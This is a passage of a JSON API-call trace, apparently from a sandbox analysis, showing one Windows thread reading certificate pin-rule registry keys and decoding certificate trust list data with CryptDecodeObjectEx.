"thread_id": "1596", "caller": "0x7ffee0bcc344", "parentcaller": "0x7ffee0baa16a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-3318940731-3379818400-2144845357-1002" }, { "name": "Handle", "value": "0x00000594" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-3318940731-3379818400-2144845357-1002" } ], "repeated": 0, "id": 1898 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0ba176e", "parentcaller": "0x7ffee0ba16fe", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000594" }, { "name": "SubKey", "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" } ], "repeated": 0, "id": 1899 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0baa29f", "parentcaller": "0x7ffee0ba17ac", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000594" } ], "repeated": 0, "id": 1900 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0ba176e", "parentcaller": "0x7ffee0ba16fe", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" }, { "name": "Handle", "value": "0x00000594" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" } ], "repeated": 0, "id": 1901 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0ba0a53", "parentcaller": "0x7ffee0ba0bb3", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000594" }, { "name": "ValueName", "value": "PinRulesEncodedCtl" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\PinRulesEncodedCtl" } ], "repeated": 0, "id": 1902 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05d77000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1903 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0ba0abb", "parentcaller": "0x7ffee0ba0bb3", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000594" }, { "name": "ValueName", "value": "PinRulesEncodedCtl" }, { "name": "Data", "value": "0\\x82E\\x94\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x07\\x02\\xa0\\x82E\\x850\\x82E\\x81\\x02\\x01\\x011\\x0b0\t\\x06\\x05+\\x0e\\x03\\x02\\x1a\\x05\\x000\\x82'\\xee\\x06\t+\\x06\\x01\\x04\\x01\\x827\n\\x01\\xa0\\x82'\\xdf0\\x82'\\xdb0\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03 \\x04,P\\x00i\\x00n\\x00R\\x00u\\x00l\\x00e\\x00s\\x00_\\x00A\\x00u\\x00t\\x00o\\x00U\\x00p\\x00d\\x00a\\x00t\\x00e\\x00_\\x001\\x00\\x00\\x00\\x02\\x08\\x01\\xd2\\xdae\\xad\\xdb@7\\x17\r170531232859Z\\x17\r180601232859Z0\\x0e\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\"\\x05\\x000\\x82\\x1f\\xa30)\\x04\\x12.files-df.1drv.com1\\x130\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x000&\\x04\\x0f.files.1drv.com1\\x130\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x0004\\x04\n.aadrm.com1&0\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x000\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x031\\x03\\x02\\x01\\x0101\\x04\\x07.afx.ms1&0\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x000\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x031\\x03\\x02\\x01\\x0105\\x04\\x0b.akadns.net1&0\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x000\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x031\\x03\\x02\\x01\\x010%\\x04\\x0e.aspnetcdn.com1\\x130\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x0008\\x04\\x0e.azure-int.net1&0\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x000\\x11\\x06\n+\\x06\\x01\\x04\\x01" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\PinRulesEncodedCtl" } ], "repeated": 0, "id": 1904 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bbdf92", "parentcaller": "0x7ffee0b9e3a5", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00000001" }, { "name": "Encoded", "value": "0\\x800\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03 \\x04,P\\x00i\\x00n\\x00R\\x00u\\x00l\\x00e\\x00s\\x00_\\x00A\\x00u\\x00t\\x00o\\x00U\\x00p\\x00d\\x00a\\x00t\\x00e\\x00_\\x001\\x00\\x00\\x00\\x02\\x08\\x01\\xd2\\xdae\\xad\\xdb@7\\x17\r170531232859Z\\x17\r180601232859Z0\\x0e\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\"\\x05\\x00\\x00\\x00" }, { "name": "Flags", "value": "0x00008004" } ], "repeated": 0, "id": 1905 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bb0cd0", "parentcaller": "0x7ffee0bbe122", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00000001" }, { "name": "Encoded", "value": "0\\x82\\x07\\xb80\\x82\\x07\\x95\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03!\\x01\\x01\\xff\\x04\\x82\\x07\\x820\\x82\\x07~0\\x82\\x03\\x1a\\x02\\x01\\x00\\x02\\x01\\x010\\x82\\x03\\x1006\\x04\\x10\\x0f:\\x05'\\xd2B\\xde-\\xc9\\x8e\\\\xfc\\xb1\\xe9\\x91\\xee\\x04 \\x94\\xa7T\\xd4F\\xd0\\xb9\\xbcr\\x0c9\\xb6\\xabs|)\\xc9Y\\xd8/x6\\xe9\\xb7\\xc5x\\xc6\\xd2\\x99>\\xdd\\xe2\\x05\\x0006\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x0006\\x04\\x10\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\\x04 \\xd4\\xc6z\\xd5\\x0e\\x19;\\x9du\\xa2!\\xd2`3\t\\x17\\x15t\\xaex,f\\xdb\\xa6D\\xa6\\x8a\\xffu\\xc0\\x7fP\\x05\\x0006\\x04\\x10\\x91\\xfa\\xd4\\x83\\xf1HH\\xa8\\xa6\\x9b\\x18\\xb8\\x05\\xcd\\xbb:\\x04 \\x064\\x8c\\xa9\r\\x7f\\xe0\\xf9\\x0cv\\xab\\x9d\\xe8\"\\xab\\xf5{\\x9a\\xb4B*" }, { "name": "Flags", "value": "0x00008004" } ], "repeated": 0, "id": 1906 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0ba16b2", "parentcaller": "0x7ffee0ba0c01", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000594" } ], "repeated": 0, "id": 1907 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7c0a", "parentcaller": "0x7ffee0bca060", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "0\\x82\\x07~0\\x82\\x03\\x1a\\x02\\x01\\x00\\x02\\x01\\x010\\x82\\x03\\x1006\\x04\\x10\\x0f:\\x05'\\xd2B\\xde-\\xc9\\x8e\\\\xfc\\xb1\\xe9\\x91\\xee\\x04 \\x94\\xa7T\\xd4F\\xd0\\xb9\\xbcr\\x0c9\\xb6\\xabs|)\\xc9Y\\xd8/x6\\xe9\\xb7\\xc5x\\xc6\\xd2\\x99>\\xdd\\xe2\\x05\\x0006\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x0006\\x04\\x10\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\\x04 \\xd4\\xc6z\\xd5\\x0e\\x19;\\x9du\\xa2!\\xd2`3\t\\x17\\x15t\\xaex,f\\xdb\\xa6D\\xa6\\x8a\\xffu\\xc0\\x7fP\\x05\\x0006\\x04\\x10\\x91\\xfa\\xd4\\x83\\xf1HH\\xa8\\xa6\\x9b\\x18\\xb8\\x05\\xcd\\xbb:\\x04 \\x064\\x8c\\xa9\r\\x7f\\xe0\\xf9\\x0cv\\xab\\x9d\\xe8\"\\xab\\xf5{\\x9a\\xb4B*\\xb4\\xf8>\\x9b\\x86\\x83\\xacQ\\xdf7\\x95\\x05\\x0006\\x04\\x10\\x98;\\x13&5\\xb7\\xe9\\x1d\\xee\\xf5" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1908 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7da2", "parentcaller": "0x7ffee0bc7c77", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "0\\x82\\x03\\x1a\\x02\\x01\\x00\\x02\\x01\\x010\\x82\\x03\\x1006\\x04\\x10\\x0f:\\x05'\\xd2B\\xde-\\xc9\\x8e\\\\xfc\\xb1\\xe9\\x91\\xee\\x04 \\x94\\xa7T\\xd4F\\xd0\\xb9\\xbcr\\x0c9\\xb6\\xabs|)\\xc9Y\\xd8/x6\\xe9\\xb7\\xc5x\\xc6\\xd2\\x99>\\xdd\\xe2\\x05\\x0006\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x0006\\x04\\x10\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\\x04 \\xd4\\xc6z\\xd5\\x0e\\x19;\\x9du\\xa2!\\xd2`3\t\\x17\\x15t\\xaex,f\\xdb\\xa6D\\xa6\\x8a\\xffu\\xc0\\x7fP\\x05\\x0006\\x04\\x10\\x91\\xfa\\xd4\\x83\\xf1HH\\xa8\\xa6\\x9b\\x18\\xb8\\x05\\xcd\\xbb:\\x04 \\x064\\x8c\\xa9\r\\x7f\\xe0\\xf9\\x0cv\\xab\\x9d\\xe8\"\\xab\\xf5{\\x9a\\xb4B*\\xb4\\xf8>\\x9b\\x86\\x83\\xacQ\\xdf7\\x95\\x05\\x0006\\x04\\x10\\x98;\\x13&5\\xb7\\xe9\\x1d\\xee\\xf5Jg\\x80\\xc0" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1909 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7e31", "parentcaller": "0x7ffee0bc7c77", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "0\\x82\\x03\\x1006\\x04\\x10\\x0f:\\x05'\\xd2B\\xde-\\xc9\\x8e\\\\xfc\\xb1\\xe9\\x91\\xee\\x04 \\x94\\xa7T\\xd4F\\xd0\\xb9\\xbcr\\x0c9\\xb6\\xabs|)\\xc9Y\\xd8/x6\\xe9\\xb7\\xc5x\\xc6\\xd2\\x99>\\xdd\\xe2\\x05\\x0006\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x0006\\x04\\x10\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\\x04 \\xd4\\xc6z\\xd5\\x0e\\x19;\\x9du\\xa2!\\xd2`3\t\\x17\\x15t\\xaex,f\\xdb\\xa6D\\xa6\\x8a\\xffu\\xc0\\x7fP\\x05\\x0006\\x04\\x10\\x91\\xfa\\xd4\\x83\\xf1HH\\xa8\\xa6\\x9b\\x18\\xb8\\x05\\xcd\\xbb:\\x04 \\x064\\x8c\\xa9\r\\x7f\\xe0\\xf9\\x0cv\\xab\\x9d\\xe8\"\\xab\\xf5{\\x9a\\xb4B*\\xb4\\xf8>\\x9b\\x86\\x83\\xacQ\\xdf7\\x95\\x05\\x0006\\x04\\x10\\x98;\\x13&5\\xb7\\xe9\\x1d\\xee\\xf5Jg\\x80\\xc0\\x92i\\x04 `\\xbd\\xedu\\xc5\\xfd" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1910 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\x0f:\\x05'\\xd2B\\xde-\\xc9\\x8e\\\\xfc\\xb1\\xe9\\x91\\xee\\x04 \\x94\\xa7T\\xd4F\\xd0\\xb9\\xbcr\\x0c9\\xb6\\xabs|)\\xc9Y\\xd8/x6\\xe9\\xb7\\xc5x\\xc6\\xd2\\x99>\\xdd\\xe2\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1911 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1912 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\\x04 \\xd4\\xc6z\\xd5\\x0e\\x19;\\x9du\\xa2!\\xd2`3\t\\x17\\x15t\\xaex,f\\xdb\\xa6D\\xa6\\x8a\\xffu\\xc0\\x7fP\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1913 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\x91\\xfa\\xd4\\x83\\xf1HH\\xa8\\xa6\\x9b\\x18\\xb8\\x05\\xcd\\xbb:\\x04 \\x064\\x8c\\xa9\r\\x7f\\xe0\\xf9\\x0cv\\xab\\x9d\\xe8\"\\xab\\xf5{\\x9a\\xb4B*\\xb4\\xf8>\\x9b\\x86\\x83\\xacQ\\xdf7\\x95\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1914 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\x98;\\x13&5\\xb7\\xe9\\x1d\\xee\\xf5Jg\\x80\\xc0\\x92i\\x04 `\\xbd\\xedu\\xc5\\xfd\\x11\\x90\\x10\\xd6\\x83/v\\xde\\xfc94s\\xd7\\xa0\\xced\\xfb\\xd6\\x8d\\xab\\xa2\\x9b\\xfd\\x0b/|\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1915 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xa8#\\xb4\\xa2\\x01\\x80\\xbe\\xb4`\\xca\\xb9U\\xc2M~!\\x04 =\\xde2\\xff\\xc4p\\x9b\\xb1\\xa3\\xffv\\xd3TA\\xf4\\xae\\x7f\\xe0^\\xe2\\x8a\\xe5\\xd6\\x17\\xa7[\\xd3n\\xeek\\xf5\\xca\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1916 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xa8\\x82z<\\xbd-\\x87\\xd7\\x83\\xb5\\x9b\\x80b\\xc8~\\x9a\\x04 %\\x88%;\\x9aAR$\\x14\\xad\\xc3\\xab\\xa2\\xf0\\xb8\\x17\\xbf;\\xaa\\x0cz\\x0c\\x19diO\\x7f^\\xff\\xc4\\xb9`\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1917 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xadmo\\xf3\\x1b$\\x011Q\\xf2y\\xe2j\\x8c3$\\x04 \\xd61\\xb2F\\x02|\\xa8\\x8e\\x9b\\x03BO#\\x0c\\x9f53R\\xb4\\x9a_\\x9as\\x15Vm\\xc2\\xach\\xd0X\\x16\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1918 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xbaO9r\\xe7\\xae\\xd9\\xdc\\xcd\\xc2\\x10\\xdbY\\xda\\x13\\xc9\\x04 \\xe5\\xd4\\x7f\\x02\\xf2t\\x97\\x81\\xc1\\x84\\xab<\\x0fT\\x9eqk\\xb21BJr\\x1f\\xec;\\xdf\\xa17G\\x9e\\x1e\\x15\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1919 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xbb\\x04\\x8f\\x1889_o\\xc3\\xa1\\xf3\\xd2\\xb7\\xe9vT\\x04 J\\xbb\\x05\\x94\\xd3\\x03\\xefpw\\x13\\x884\\xab1^\\x94\\x1e\\x960\\x93\\xe0[K\\x14\\xaf]\\xcbRw\\x12\\xc0\n\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1920 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xd0\\xfd<\\x9c8\r{e\\xe2k\\x9a?\\xed\\xd3\\x9b\\x8f\\x04 9\\xa4u\\x87\\x0b\\xf2\\xb4\\x8cR\\x03\\xa0\\x8e\\xa5\"y\\xbc\\xe7\\x1a\\xbb\\x8d>7\\xe0k\\x89\\x07\\xa2g\\xec\\xd7\\xdaj\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1921 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xd6`0\\xcd\\xb7\\x92\\x86\\xc9\\xcb\\xee\\x93\\xc1O\\xa3\\x99\\xcc\\x04 E\\xbaB\\xfe\\xb2v\\x9a\\x95c\\xfaQ\\xcc'\\xdd\\x14\\x96\\xef\\xd0\\xe4\\xc5\\xd1\\x96\\x89\\x803\\x17\\x8c\\xc8u\\x8fP\\xca\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1922 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xd8\\xb5\\xfb6\\x84hb\\x02u\\xd1B\\xff\\xd2\\xaa\\xde7\\x04 p\\x8f\\x94en\\xadw\\x16k\\xe938[7\\xb7\\xd5\\x8f\\x7f\\x10\\xb2\\x8c\\x12ld\\xa7\\x86\\x1b\\xc6k\\xb6g\\xc4\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1923 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xfaF\\xce|\\xbb\\x85\\xcf\\xb41\\x00u1:\t\\xee\\x05\\x04 H\\xa0:\\xf5\\x0b\\xc5\\xa1\\xf9q\\xc0\\xc1\\x93\\x8b\n\\xb2\\xd5\\x9bT\\x86\\x9e\\x18\\x01\\xf3x\\x1d^\\x1c\\xd2\\xf7\\xe3\\x93\\x91\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1924 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7da2", "parentcaller": "0x7ffee0bc7c77", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "0\\x81\\xb1\\x02\\x01\\x00\\x02\\x01\\x010\\x81\\xa806\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x0006\\x04\\x10\\xbb\\x04\\x8f\\x1889_o\\xc3\\xa1\\xf3\\xd2\\xb7\\xe9vT\\x04 J\\xbb\\x05\\x94\\xd3\\x03\\xefpw\\x13\\x884\\xab1^\\x94\\x1e\\x960\\x93\\xe0[K\\x14\\xaf]\\xcbRw\\x12\\xc0\n\\x05\\x0006\\x04\\x10\\xd8\\xb5\\xfb6\\x84hb\\x02u\\xd1B\\xff\\xd2\\xaa\\xde7\\x04 p\\x8f\\x94en\\xadw\\x16k\\xe938[7\\xb7\\xd5\\x8f\\x7f\\x10\\xb2\\x8c\\x12ld\\xa7\\x86\\x1b\\xc6k\\xb6g\\xc4\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1925 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7e31", "parentcaller": "0x7ffee0bc7c77", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "0\\x81\\xa806\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x0006\\x04\\x10\\xbb\\x04\\x8f\\x1889_o\\xc3\\xa1\\xf3\\xd2\\xb7\\xe9vT\\x04 J\\xbb\\x05\\x94\\xd3\\x03\\xefpw\\x13\\x884\\xab1^\\x94\\x1e\\x960\\x93\\xe0[K\\x14\\xaf]\\xcbRw\\x12\\xc0\n\\x05\\x0006\\x04\\x10\\xd8\\xb5\\xfb6\\x84hb\\x02u\\xd1B\\xff\\xd2\\xaa\\xde7\\x04 p\\x8f\\x94en\\xadw\\x16k\\xe938[7\\xb7\\xd5\\x8f\\x7f\\x10\\xb2\\x8c\\x12ld\\xa7\\x86\\x1b\\xc6k\\xb6g\\xc4\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1926 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": 